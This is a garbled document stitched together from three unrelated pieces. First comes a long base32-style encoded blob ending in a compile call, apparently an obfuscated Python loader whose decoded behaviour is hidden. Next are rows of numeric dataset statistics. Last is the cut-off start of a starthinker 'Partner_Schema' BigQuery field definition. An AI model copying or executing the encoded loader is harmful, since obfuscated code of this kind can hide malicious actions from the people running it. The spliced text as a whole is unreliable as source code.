GJEVMSKWI5KTEUCKIZFEKR2WKNEEWWSKKVMVGU2LJFNEWVCFKYZFISK2IRLEKU2TKVEVMSSUIVJVGSCLLJCEMTKTGJLUOSSMIVKVIU2IJFLEQVSHKUZEQSSOJZCUOVSTIZFU2WSGJ5JVGU2JKJBVMR2WKNKEUQSGKVGVGU2WJNLEURCFKYZEUS22I5CUWTKTK5FEUSSVK5LVGRKLKZFVMSKVGJDUUTSMIVKVEU2IJNCVURKVKRBUWSKSIRCTEVKTJRFFURSVGJLVGRSLKZFUKVKVGJGEWWSCKZGVIS2UI5FEGVKVKRJUUS22JNLEKUZSLFFE4SSFIVLEWUCLJZDFMR2TJNJUSTSLKU3FMU2UJJJEMRSFKJFVOSSWJJDEOUSTJBFUURSFJFJEWV2LJZDUKV2XKNDUWVSGKZGU2U2UJJHEQRKNKJFVIS22JJKTMU2LK5ETKTCFJ5KVUU2LJZDEKVKTINDEUNKMIVLVMQ2MJJNEMRSLKJFVIR2KJRKVKUKTJVEVMRSWJNLVGVCJGVDEKTKSJNHEWTSKKVGVGS2PJJJEGVSPKYZFISSSIVLFKUSTI5FE4SSFK5LEGS2KJJDUKS2VGJKUWTSHKVJVOU2FJNNEMVSLJVJUMSSKIRCVKUSLJZFUUSSVJVJTER2KJJFVKMSVGJGEUNKGIVKVGMSWJI2UWVSHKZBUWSKKIRDEWVSLKNFU4RCVKVLFGTCLKJBVMTKRGJGEUSSOIVCVEU2MJNMVURSJKMZE6SKOJNLE6VSTKRETKRSWKVJUGV2JGVDVMR2WKNFUUSSGIVFVGS2TJJHEORKXK5JUOS2WI5LEOTKTLBFEURSFK5LFGRCLKVNEKWKTJJLESWSEIUZFKWSTJNNEMRCLKRBUKSKWJNCUOUZSJNFEUQSWJVJTEV2KJZFUKV2UKNCUSVSLKU2FGMSLJJHEYRKZKZJVAS2VLJCTEU2TKNEVEQ2UJFKVGTCKKJDFIS2SKNLUSNKKKVLVIMSKJJNEMVSNKMZFOR2KJNCVGVCTIZFVUS2WI5GVGWCKIZEEKT2WKNEEWWSGKVLVGU2LJFLEGVKXKZBUYS2OIZCTIUZSIZFTKS2WI5ITESSMJJCFMTKSGJHEWTSDIVKVGU2LJFLEIVSFKNJVISSOJVLFKUSLJBFU2WSFGZJUWU2KJZBVMT2WJNKESUSFKZKVEU2GI5JEWRKHKJFUUS22IZCUWURSKRFU4R2FLFJVGRCLLJDFMR2NKNKUUSSIIVLVES2WJNJEUVKTKNFVOSSKJRCTMVSKKNEVURSFGRKFGRSLJZGEMR2UKNGEUVSOIVEVES2UJNHEMVKVKNJUIS2WJRLE2VJSJVFE4RSFJVLEGTCLJJFFMT2TJJLEUSSLKZHVMQSTJJHEMVSVKJJVOSSWJJCEKVRSJRFFUQSVJNKTET2KJZCFKV2WKNCEWWSCKZFU2U2JJJFEGVCFKZFVUS2KIJKU2UZSJ5EUUS2WJ5KTETCHJJCVMVKRGJLEWNKMIZDVIQ2MJJNEIRSLJZBVGSKOIRCVOTSLJVEVURCWIVJTETKKJZHEKSKSKNHEWSK2IZGVGMSPJJHEGVSLKVJVISRVIVLE2URSK5EVMS2UIVKDES2KLJCUKS2UJNLUWTSJIVLVIU2HJFNEOVSHKUZEISSGJJCUOVSLLBFVUSSWJFJTEU2JLJBVISKVKNKEWWSGKZGVGU2HJE2UYRSHKMZEWTCKINKUWVCLKNDUUTCVKNKFGR2LKZFVMT2VGJEUUTSOIVGVMU2OJJLEUVSBKNJUWSSCINKU6VKTJRGEERSWJVJVGVSKIZFFIRKNKNFEWWSHIVFVEMSVJJHEWRKXKNJUOSKWJNLEKUJSI5ETKRSFLFJEWSCLJJFFKWKUINFUSWSEIUZFKMSMJNJEIVKVKNBVMS2OJJLEOVCLJJFVURSGJVJTEVSLJZFUKVKUJJJUWVSGKZGVGU2WJJHEGVSVKJJVAS2OIZDE2U2TKNEU4S2VGZLFGS2LJZDEMRKSGJDEWVSKIVDVMU2LJJNEMRKLKYZFMS2OIVCVKU2TIREVMRSWJVJTEVSKJZEEKTKSJNMEWVSKKVEVGMRSJFNEWVCFKZFFGSSSIZCVKU2DIZFFMSSFK5JFGTCMJJDEMS2XJNKEOSSGKVJVOU2NJFKVURSLK5JVISSJGJKU2USTJZFUKWSGJVJDEMSKKJBUKS2WKNCEUTSEKZGVCMSXJJLEWRKXKUZEWSS2I5DEWVJSJ5FE4R2FK5KVGRCLLJDFMQ2NKNGUUSSIIVGVES2KJNFEMVKZKMZFUTCKIRCU6VK2KNFDKRKWKVITEV2KJZGEMR2WINFUUWSDKZGVMS2TI5FEYVKTJZFUYS2SINLE2UJSJRFEURSFJNJEWTCLLFNEMT2TJNHUSUSDKZHVMMSMI5FEKVSNKRFVOSSGJFKEKUSDJNEVUSCFJNLUWU2KJZDUKV2WJMZESVSNKZDU2USTJJDEYRKXKJFVQS2WJZDEOU22KZEVMS2FK5KTEVCJLJDFIS2TKNLUSNKLIVDVIS2LJJFEERKLKMZFIR2KJNKVKVCTJNFVMS2WJFKTETSKJZGEKMSWKNEEWVK2IU2FGU2PJJJEGVCFKZJVISSCIZLEWV2TIZFE4SSWI5JDES2LJJBFMS2OKNLUWTSLIVJVOU2HJNKVURSPKUZEOSSKIRCVKVSTJBFVCWSFKVKEGS2JJJGEKV2WKJJUWWSGKU2FGMSGJNLESVSHKIZEYS2VLJCU2USLKZDUUTCVKVJVGRKJKZGFMRKTGJEUUTSHKZKVES2WJNEVURSPKNFTESSSINLE6VSDJRFVERSWJVJFGVSHKJEVIRKSKNGUSWSFKZGVEMSTJNHEORKXKZJU6SKWI5LESTKTK5ETKRSFGJJEWVSLJJFFKMSTJNLUUSSMIUZFKWSTJRDEMRJUKNJUMSSWJRCVOVSTJRFFURSGJNLDEVCKJZDFKU2VKNCEWWSIKZGVGMSMJJHEQRKNKZBUYS2KJJKU2URSKNFEURCFJ5KVGVCKKZCVMVKSKNDUUVSKIRCVKU2MJJNEIVKLKYZFOSSNLJCVGVSTJBFVURKWI5GVGWCKJJEEKUKSJNNEWSSGKZGVGMSTJJFEWVSHKUZEYSZVIVKVKVCDIZDUUTCFKVKTETCHKZCEKS2OINKUWTSEIVJVMU2NJFLEYVSHKEZE2SSKJZCU2USTJZFVCWSGJFJTET2JJJFVMR2WJNKESUSGKZFU2MSHJJLEWVCFKZBUWSS2IVCUWUZSK5FU4TCFK5JVGQ2LLJDVMRKNKNGEUSSKIVMVES2QJNNEURSHKNJUWSKWJRDEWVKTKRFVURSGJVJVGRKJKZGEKV2UINFUYSSDIZFVGMSWI5FE2RKXKRJUGS2WJJLE6VJSJFFE4TSFIVLEUU2LKVNEMTKTKNFUSWSDKZBVKU2MJJBEMVSVKJJVOSSWJJKEKUZSJNFEURSWJVJDEVSMJJFFKT2TKNDEWVJSIZDU2U2WJJDEYRKZKJFVMS2VLJCVOU2TJNEVEQ2VK5LEGTCLJJCFKVKTGJLEWTSMIZD
VGMSKJRFEGRSNKRFVMR2KI5CVKVCTJ5EVMR2WIVKTETKKJZEVMVKSKNEEWSK2IVLVGU2LJJHEYRKXKZJVIS2SIVLE2USLK5FVMSKWI5LDES2LLJCVMTKWJNLEOSSGKVKVOU2JJFLEMVSHKMZFQSSKIZCVOVSLLBFVMSSVJ5JTEV2JGVGEKT2WJJJUYQSGIVKVGU2GJRDEURKXKVBUYTCKIZDEWV2LKRFU4RSVKNKVGTKJKVNEMS2TGJKUURJSKVGVEU2OJNGVURSLKNFVOSSOIRCU6VJSIRFE4RSFKVIVGVSKKZFFIRKWGJFUUWSHIZFVMMSVJNHEGVKXKZJUWS22JBLEWTKTJRFEUSCFGRJEWUCLLJFFMQKTGJLEYSSEIZDVKMSUJFNEIVKVKMZFMR2KJNLEOUZSJRFVURCGJNLEWU2LJZCFKVKOJNFUWUSDKZFU2U2LJJJEMRKNKZJUUS2SIZLE6U2LJ5EU4Q2WI5LEGVCJGVCVMVKRGJLUSNKHKZDVEMSLJJFEKRKLK5FVGSSOIVCVOUSLGJEVMTKWI5KVUU2KIZFEKR2WJJJUWVSKKVMVGMSPJFNEWVCJKVJUIS22IZLE2UZSI5ETKS2FK5KEGTKKJJBFKTKUJNKUUTSLIVHVGU2IJNLEWVSHKUZFASSGJRCU2VSTIZFU2WSFGJJVGT2JLJBVKMSWKNKEWQSGKUZFOU2GI5NEUVKXKYZEUSS2I5CUWVRSK5FU4S2FK5KVGR2JKZFVMRKVGJMEUSSMIVKVES2IJNMVURKXKNJTESKSJRCTEVKSKNFU4RSFGRJFGVSLKZGFMR2SJNFEWWSEIZGVES2OJNHEWRKVKNJUSSKWJBLEKUZSLFFE4RSFKVLEWWCLJVNEMR2TJNHUUUSDKU3FMSSTJNJEMVCLKJJUMSSWJNDEOUSTJVEVURSFJVJDEVCJJZDUKV2TKNCUSVSHKZCU2U2VJE2UMRKJKZFVISZVJJKUWU2LKZGEURCFK5KEWVCLKZDEKS2NKNLEUTSMIVDVIQ2MJJLE4RKNKMZFISSOJRKVKUSTJVEVMSCWJNGVGRKKJJFEKTKSJNLEWSSCKVHVGU2PJJFEWRKLKZJUYSSOIZDFKUSTK5FE4TCFK5LEWTCKLJBVMS2WGJLUWTSIIVLVOU2DJNNEMVJSKUZFASSKIZCVCUSLLJFUURSWJVJTEMSKJJGEKQ2VLJJUWWSHIVKVCMSXJNHEWVCFKZBUUR2WINLE2USLKJDUUTCVKNKFGTKJLJCFMSKRGJGUUUSGIVEVEU2OJNGVURSRKMZE6SKSJNLE6VKTKRFE4RSWJVJTEV2KKZFFIRKUKNFUUSSEIVFVIS2XJJHEORKXKVFTESK2I5LEOTKTKBFEKMSVI5LFGTCLLFNEMSKTJJLESWSMIZFVKUSTJM2UKVCLKNJVKSKWJRCEKUZSJNEVMTSFJVJTEWCKJZFFKV2UKNGUSVSMKZHVKMSEJJHEYRKTKZJUQS2WJZDEOU2TI5FFEQ2VKNKVGTCMIJDFMRKTKNLUURSKKRCU2U2KJRFEMVSJKNFVOSKOI5CVOV2TI5FVERSWI5ITER2KJUZFKV2SKNEEWUSCKVMVIQ2LJFJEGVJSKZBUYS2OIZCTIU2TIZFDKSSWI5JEGTCLLJDFMTKSGJLEOSSIIVKVEU2NJFLEMVSNKUZEOSSOJNLFKUSTJRFU4SSVGZJUWV2KKJCEKV2WJNKEUUSGIVKVEU2WJNHEYVSHKJJUYR2WIZDE2URSJZFU4RSFKVLVGR2LLJDFMSKNKNMEUSSGIVKVMS2YJNLEUVKPKMZFMR2KIRCUWVCLKRETKRSFJVKEGRSLKZGEMR2TINGEYSSGIZFVMS2UJNGVURKTKZJUIS2WJRLEWVKTKRFE4SCFJVJEUVKLJJFFKTKUINDUUSSMIVHVKU2MJJJEORKVKJBUOSSOJBCUOVKTJBFEUR2GJNLEWVCLJZCVKU2WJMZESWSDKZDU2U22JJFEQRKNKJFVMS22IZKVCUZSJZGEUQ2FJNKTETCLGVDEMRKRGJLEOWSMIZDVGMSMJJNEIRSLKJFVGS2OIRCU6VKTJREVURCWIVKTESKKJJDEKT2SJNGEWWK2IZGVGS2PJFNEWVSTKUZFISJVIVLE2URSK5ETKR2WI5LEWSSHKZCEKS2WJNLUUTSMIVLVKU2LJNLE2VSHJVJVQSSKJJCVSUSLLBFVMTSGI5JTEV2JLJCEKS2VKNCESWSGIRFVGU2GJM2UURSHKRBUWSSKIJCU2VCLKVFE4S2VKNKFGRKLKZFVMRKVGJHEURSMIVIVMU2MJNGVURSLKNJUWSSCINKVGVSTKRFFURSVKVJFGVSKKZFFMR2SGJFUUSSGKZGVIMSXI5FEGRKVKNJUOSK2JNLEGTKTK5FEUSCFLFJEWWCLLJFFKWKTKMZESSSEIVLVMSSTJM2UMVJUKFJVMSZVJRLEOUSTJRFVMTSFJVJTETSLJZEEKVKTKNDUSVSJKZCVGMSTJJHEMRKNKJJUQS2NLJCVOU2LGJFE4TCFI5LEUU2LKJCFKVKSJNLUWVSKKRCVMS2KJNNEMVSJKJFVKSKOIVCVKU2TIVEVMRSWIVJTEVKJGVDEKV2WJNLEWSSKKVMVGS2XJJJEYRJSKVFFGSSSIZCU2VCTIZETKTCGI5JVGTCKKZHEKTKSJNKEOSSIKVKVKU2MJNNEMVSLKUZFKSSKJRCUWVSTJZFVEQSWJ5JVGT2KIZFUKS2WINCEUTSGIVKVCU2XJJLEYRKXKUZEWSS2IVCUWVRSKVFU4RCVK5LVGSKLLJCFMS2NKNIUUSSEIVIVES2IJNNEUVSBKMZFMTCKIRCVGVJSJRFE4RKWKVKEGRSHJJFVMR2WINGEOVSDKZFU4Q2UJNHEWVKTKZJUYS2SINLEOTKTJNFFERSFI5LEWTCLJVNEMRKSGJFUUUSLKZHVMQ2UJJLEKVSNKRBVOSSOJNKEKUSDJNFFUSCFJNLDEV2LJZCUKV2WJMZESWSJKZDVKMSMJJFEMRKHKZFVIS2WJJKVSU2TKNEVUTCGJNKVGVCJGVCVIS2TKNKUSVSKKRCVGU2MJJFEIVKLKMZFIR2KJRCVSU2TJNFVMSSWJ5KTESCKIZHEKT2WKNEEUVSKKVGVGU2HJJJEGVSLKVJUISK2IZKTIUKTKZFTKSSWI5JTESSLJJDFMS2NKNLEYSSKKVLU4S2FJNLEWVSHKEZFOSSOJBCVKVSTJBFVEQSVKVJTEMSJGVCEKMSWINGEWWSEKVKVEU2GJNLEWRSHKRBUYTCKIZLE2USLKZDUUSKVKVKFGRCLLJFVMRKTGJKUUTSIIVKVMS2WJNEVURKXKNJU6SSOINLEOVSTJRFVERSGIVJDERSLKZFEMR2WGJGEWWSGIVGVEMSXJNHEMVKPKZJUOSK2IZLE2TKTKRETKRSFJVLEWVSLJZFFKR2TGIZESWSLKREVMSSTJRBEMRKVKNBUMSSWJRCVOV2DJRDVMRSGJNKEWVCHJFNEKU2UKNGUSVSIKZEVGMSVJJGTEVKLKZBUYS2SJJKU2UZSJ5FFER
CFJ5KTERCKJZDFMVKSKNDUUTSMKVLVMQ2IJJFEIRSLKUZFQS2OI5KVGVSTJVFVUR2VGJKTETSKJJFEKRKSJNHEWWSGIZFVGMSPJFNEYRJSKVNFGSZVIZCUKUJSK5FDKS2WIVKTES2KJJCFKS2WJNJEWTSEKVKVMU2MJFJEGVSLKUZESSSKIZCUWVSTJRFVURSWJFJTET2JLJFVMR2WKNKEUVSGKZKVCMSXJE2UOVSHKZBUWSSKIVCUWVSLKNFE4TCFK5LVGR2LLJAVMR2NKNFUUUSGIVDVMU2QJNKVURKZKMZE6SK2IRCUWVKKKNFVURSEJNKEGRSJGVGEKR2TGJGEUSSDIVFVIS2VJJHEUVKVKRJU2SKWJBLEWVJSJRFE4TCFJFLFGTSKKZFFKWKTKNHUUWSDKU3FKU2UJJNEMVKTK5JUOS2GJJKVOVBSJJGEURSWJVJTEV2LJZDUKT2TKNDEWWSHKZCU2U2YJJCTEVKVKZBUMS22IJKVOU2LGJEVMQ2VK5LEWTCLGVDEKNCTJNDEWNKMKZDVGMSMJNKVURKNKIZFIR2KJVCVKU2TIVEVMTKWIVJTEUKKJZFVMVKSINDEWTK2IU3FGSZSJFHEYRKXKZFFGS2SIVLFKUSTKZFFMS2FI5JFGTCLLJDUKSKSJNKUSTSHIVMVGU2EJFLEOVSJKMZFOSJVIZCVOUSLKZFU4SSVGJJUWV2KJJGEKV2WJJJUUVSGIVGVIQ2GJNDEYRSHKNJUYSS2IZDE2U2LKRFU4RSFJ5JVGTCLKZGFMTKVGJKUUTSKIVGVEU2OJNHEUVSPKNJVOSSKINCUWVK2KNFE4RSVKVIVGVSKJZFFIRKWKNGEUWSCKVFVMS2SJNHEKRKTKZJUYS22INLEGTKTLBFEURSFKFJEWVSLJJDFMUKTGIZESWSLKZJVKMSUI5FEMRKFKEZFMSZVJRDEKVJSJNDVMRCFJNHEGU2HJJGEKV2UKNGUWWSEKZBU2U2NJJJEMRKJKJJU4S2NLJCTIUZSJ5EU4S2WJNKTEVCKIZCVMTKRGJLUSVSKKRCVIMSLJJNEIRKLKZFVOSSKJNKVOVCLGJEVMSCWI5KTETCKJJEEKV2WINDEWWSGIZDVGMSTJFNEWRKXKVJUYS2WIZCTIU2LKVEVMSSGI5JTESCLLJCFKS2TGJJUOSSMKVJVIU2HJNLE2VSHKUZEKSSOJZCU6VSTJZFU2WSGJNJUUVSJLJBVMU2WKNGEWWSGIZKVEU2WJNHEUVKXKYZEUS2KI5CUWVJSKZGEUSSVKVJFGR2JKZFVMSKVGJDUUSSMIVMVES2YJNJEEVKXKMZDESK2IRCTEVSCKNFVERCVKVJUGRSMIZFFMR2SINGEYSSEIZGVGMSUI5FEWVKVKNJUGSKWI5LE2VJSK5FE4R2WKVJFGUCLJZFFKT2TKNDUUTSDKVLVMU2UJJJEMRJUKJFVOS2WJJCEKVRSJNEVURSFJNLDEV2HJJDUKVKXKNBUWVSGKZGU2U2QJJFEQRKFKZFVQS22JJKVKUZSGJEU4S2UIVLEUU2MIZDEKVKSKNDEOUSKIVLVGQ2MJRFEERSLJZBVIR2JLJCVGU2TIVEVMSCWJNGVGTKKJEZFKS2WKNDEWUSCKVGVGU2PJJHEWRKLKZJUISSSI5CVKUSDIZFE4SCFI5LEGTCKLJDFMS2VGJLUWTSGKVLVKU2EJNNEIVJSKUZEUSSKJBCTIUSLJBFVURSVGRJTEU2JLJGEKT2VGJKEUNKGIZCVCMSWI5NEWVCFKZBUWTCKIRDE2VCLKVEU4TCVKNLFGS2LLJCFMTKRGJGEUSSOIVHVES2MJNEVURSPKMZE6SKWINLE6VSTJRDUURKWJVJUGV2JGVFVIRKTINFUSWSGIVFVEMSXJNHEORKXKZJUWS22IVLEOVJSIRFEMTSFK5LEUU2LKZFFMSKTLJLESWSMIUZFKMSUJM2UKVCLKMZFKSKWJJKEKVCDJVFEUQSFJVKEWVCKJZFUKVKUKNGEWVSMKZEVKMSJJJDEYRKZKZFFKS2NLJCVCU2TJ5FEUQ2VGJLFGVCJKJDFMS2XKNDUUVSKKZDVGMSLJFFEEVSLJZJVOS2OINCVGV2TI5FVUR2WIVKTEV2KJUZFKV2SJNEEWTK2IVKVGMRSJFFEYRKXKRFVIS22IZCVKU2TKZGEMSKWI5JFGTCLKVNEKTKSGJKEOSSEKVKVGSSTJNLEYVSFKMZFSSSKJRCVKVSLLJFU2WSEIVJUUVSKKJBVIRKWJNFUWTSGKZKVEQ2WJNLEURCFKJJUYS22IZKU2URSKRFE4RSFK5LFGT2JKZDVMRKTGJLUSNKGIVDVMS2WJNJEMRSHKMZFOSJVJRCUWVSKKNFE4RSFGRJUGRSKKZGEKR2SKNGEUWSGIZFVEMSUJNHEQVKVKRJUYS22JBLE2VJSIVFEUSSFJVLFGRSLJJDFMT2TJNLUUSSDKZHVMU2UJJHEMRSVKJBVOSSWJJCEKVJSJBFEURCGJNKTEWCLJZCFKU2WKNEEWWSDKUZFKMSYJJFEIRKRKJFU4S2KIZLFKUZSJNFEUS2UJVKTETCLGVCVIS2UINDEWTSLIVLVMQ2MJNNEIRKNKJFVGS2OIRCVOTSLJVEVMTCWJNITETKKJZDEKTKSKNGEWNKGKZEVEMSLJJJEGVJWKZBVISKWIVLE2U2TK5FE4TCWI5LEGS2LJJCEKS2UJNJUUTSHIVKVMU2LJNNEOVSHKUZFQSSKJJCUOVSLKBFVUQSWJFJVGU2JLJBVMS2VJNKESNKGIU2FGU2VJFLEYRKHKRBUWTCKIRKU2UZSK5FE4TCFK5KFGRCLKZFFMT2VGJDEUTSOIVGVMSSTJNKVURKNKNJUWSK2INKTEVKTJRFEURSWKVJFGV2KKZFFIRKTKNGUUSSCKZFU4U2WI5FEORKTJZFUOSKVGJDEKUJSI5FESMSVK5JEWWCLLJBFKV2TGIZESUSDKVLVMU2MJNHEMVJUKJBVMS2WJJDEOUZSJRFVUR2GJVKEWVSHJJDUKVKTKNDUSVSHKZGVGMSNJJHE2VSVKJJUMS2NLJCTMU2LK5FE4TCFJ5LFEU2LKJDEMRKSKNLUWVSKKVDVMMSKJJNEIVSNKIZFIS2OIZKVKU2TIVEVMRSWJNJTEVCKJJDEKVKWJNMEWNKKKVDVGMSXJJDEYRKPKRFVGS2OIZCU2VCTIZFTKTCFI5KFGTCLKZHEKS2XJNJUOSSGKVJVOU2FJFKVURSLKUZEKSSGJZCUSVSTKZFU2WSFJ5JUUVSKJJBVKT2WINCEUTSHIVKVCMSGJJHEWRKXKUZEWSS2IZKUWVRSKVFU4R2VKNLFGSKLLJEFMS2NKNGUUSSIIU2FES2KJNNEUVSBKMZE4TCKINKESVJSKRETKRKWKVITEVSKJZGEMR2WINFUWSSEIVGVMS2UJNHEYVKVKZJUWS22IRLESTKTJNETKTCFIVLFGTSLJFNEMT2TGJHUUTSDKZDVKMSUJE2UMVSVKMZFOSKOJNKEKV2DJNEVURKFJNKDEV2LJZCUKV2SJMZESVSMKZDVKMSMJ
JDEQRKHKZFVQS2WJJDEOUZSJ5EVUS2UJFKVGVCJLJDFIS2UINDUSNKJKRCVIQ2MJRFEGVKNKRFVISSOJJCU6U2TJBEVMS2WI5KTESCKIZGEKWKWKNDEWTK2IZFVGU2PJJLEYRSLKVJVISSKIZKTIU2TK5FDKSSVKVLFGSSKLJDFMSKSJNLUUSSKKVJVKU2GJNNEWVSFKUZEQSSKJRCVKUSDIZFVSWSFKVJDEV2JLJBVKV2VKJJUWVSFKU2FEU2GJRDEUVSHKEZEYTCKIRLE2U2LKRDUUS2FKNHEWR2JKZEVMTKTGJKUUTSKIVKVMS2UJNGVURSPKNJVOSSSINKTMVSTJNFU4RSFKVJFGRSHKJFUKR2SKNFUUWSHIVGVEMSTJFHEORKVKZJU6SKWIZKTIVJSKVFE4SCFKVLEWVCLGVFFKSKTGIZEUQSMIVLVMSSTJJLEMRSFKJJUMSSWJRDEOUSTJRFEURSGJNKDEVCLJZEFKVKTKNGESVSGKZGVGU2UJJFEQRKLKZFVMS2KJJLE2U2TJ5FE4Q2FJNLFGVCKIJDEKTKUKNDEUTSMIRCVMU2MJJNEGRSLKUZFQS2OINCVOV2TIVFVURCVGJKTEWSKJJDEKUKSJNJEWSSGKZGVGMSLJFNEWVSDKVNFGSRVIVKVKUZSK5FDKS2WKVKTETCHKZCEKTKWJNJEOSSMIVLVIU2MJNNEGVSLJVJU2SSOIZCUOVSTJRFFUQSWI5JUWT2JKJBVMU2VKNKEUTSFKZKVEQ2XJJDEUVCFKRFUWSS2IRCUWUSLK5FU4SCFK5JUWMSJLJCVMRKNKNGEURJSKVLVMU2IJNJEUVKZKNJU6SKWJRCTEVKTJRFTKRSGJVJVGVKJKZFEKV2TGJFUWVSOIVGVGMSXJJHEYVKXKRJUQSKWJRLESVJSJBFEMTSFJ5LFGSCLKVNEMSKTKNFUUSSDKVJVKU2MJRBEMVSVKNJUOSJVJJKEKVJSJJGEUQSWJNJTEVSLJZBUKV2OJNDUSWSHKZDU2U2HJJCTEVKZKJBUMS2NLJCVSVCDJNEU4RCFGJLEGTCLJZCFKVKTGJDEWNKLIZDVEMSKJNNEMVSNKQZFMR2KINKVKVCTJ5EVMR2WJVJVGVSKJZBVMVKSKNFEWTSKKU3FGU2DJFHEYRJWKZFVISSSIZLFKUSTKZFFMSSWI5LFGS2HKZDEMSKSJNLEOSSGIVLVOU2IJFLEMVSHJVJVOSSKIZCVKVSLKZFVMSSVJ5JUWV2KJZGEKU2WJJJUSNKFKRFVEU2GJRDEURSHKNBUYSSKIJDEWV2LKRFU4RSVKNKVGRKJKZGFMTKVGJGUUTSMIVFVMSSVJNFEEVSNKMZE6SSCINLE6VKTJRFEURSWKVJDER2KKZFUKV2VKNEEUSSEKZFVMS2TJNHEQVKTKZJUQS22I5LEOTKTKBFEUSCFJVJEWRSLLJDFKNCTGJHUUSSEIUZFKMSUJNHEMRSFKEZFMR22JRDEOUSDJNFUURCFJNHEGU2LJZGFKV2WKNFUSVSMKZCU2U2MJJHE4RKNKZFUYS2ZLJDE6URSJNEVMQ2WJNKTEVCJKJDFMTKSKNLUUVSKKRCVMU2LJJFEIRKLKZFVOSSOJNCVOTSLJNFVMRKWI5GVEU2KIZDEKWKSJNIEWUSGKZEVGU2TJFNEGVSLKUZEISK2IZCTIVCDI5ETKTCGI5KEGS2KJJCEKTKUJNJEUTSLIVMVGU2NJFLEUVSPKUZEMSSGJNLFKUSTJRFFMSSWJNJVGS2KIJBVKV2WKNGEUWSGKUZFOU2HJI2UUVKVKZJUWSS2IZKUWUZSK5FU4Q2FKVLFGRSLLJFVMRKRGJLUUSSIIVKVES2YJNKVURKVKNJTESJVINKVOVSSKNFVMRSVGRJDERSLGVGFMR2SJNGEYSSDIZFU2U2WI5FEORKVKNJUOSKWI5LEKUZSJNFE4RSFJVLEUVKLJVNEKVKUINFUSUSEIVDVMSSTJJJEMRCLKJJUMS2WJFKEKVSTJBGEURSWJFJEWV2JJZDFKU2TKNCEWWSHKZGVGMSUJJHEQRKZKZFVIS22JJKVSUZSKNEU4TCFI5KEWVCKKJDEKVKUKNDEUNKKIVLVIQ2MJNLE4RKNKQZFISSOIZKVKU2TJRFVUSCWJNJTEVKKIUZFKS2WKNDEWSSKKZHVGSSWJJDEWRKLKZJFGSSOIZDFKUSTIZFE4TCFK5LDETCKLJDFKS2WGJHUUTSEKVJVOU2GJNNEIVJSKUZEKSSKIZCUKUSLJJFUURSGI5JTEWSMJJBVMU2VGJKESTSFKZKVGMSVJFLEYRCFKZBUYTCKIRCUWVCLKRFU4RCVKNHEWS2JKJBVMR2VGJGUUUSGIVEVEU2OJNJEMVSFKIZEWSSGJNLEWVJSJNFU4RSWJVJUWV2KKZFFMR2XINFUUWSFIVFVKS2XJJHE4RKXKNJUGS2WIZLEOVJSGJETKRSFLFJEUV2LLFNEKSKTJNFUSUSLKZFVKUSTJFNEIVKVKMZEMSZVJRDEOVCDJRGEURCFJVKEWU2HJJEVKVKTJJJUWVSJKZGVGMSWJJHEQRJSKZJVISSVLJDEGU2TGJFFERCGI5KVEU2LKJCFKNCRGJDEUVSKIZDVEU2MJNNEKVSJJVJVCSSJGJKVCVSLKVFU4TKWKNGTEUKKLJGEMU2SGJKEOTSDIVGVEU2GJNLESVBSKBFDKSCVKRJVSWJTKBHFMWKHKMZUIRSGIVKVCPJ5HU6SOLDDN5WXA2LMMUUSS===',compile))
| 6,939
| 27,655
| 0.994992
| 59
| 27,756
| 467.372881
| 0.779661
| 0.00029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063328
| 0.002126
| 27,756
| 4
| 27,655
| 6,939
| 0.932267
| 0.003387
| 0
| 0
| 0
| 0
| 0.990202
| 0.989768
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
430258e09d9842e5882cfb182c1142544184406c
| 11,705
|
py
|
Python
|
starthinker/task/entity/schema/Partner.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 54
|
2019-01-23T10:30:56.000Z
|
2022-03-08T13:57:22.000Z
|
starthinker/task/entity/schema/Partner.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 204
|
2019-08-29T04:58:17.000Z
|
2021-07-30T04:27:07.000Z
|
starthinker/task/entity/schema/Partner.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 25
|
2019-04-01T21:08:25.000Z
|
2021-10-21T00:51:00.000Z
|
###########################################################################
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
Partner_Schema = [
{ "name":"common_data",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"name",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"active",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
{ "name":"integration_code",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"currency_code",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"exchange_settings",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"exchange_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"seat_id",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"seat_user_name",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"default_partner_costs",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"cpm_fee_1_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_2_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_3_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_4_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_5_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_1_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_2_millis",
"type":"INTEGER",
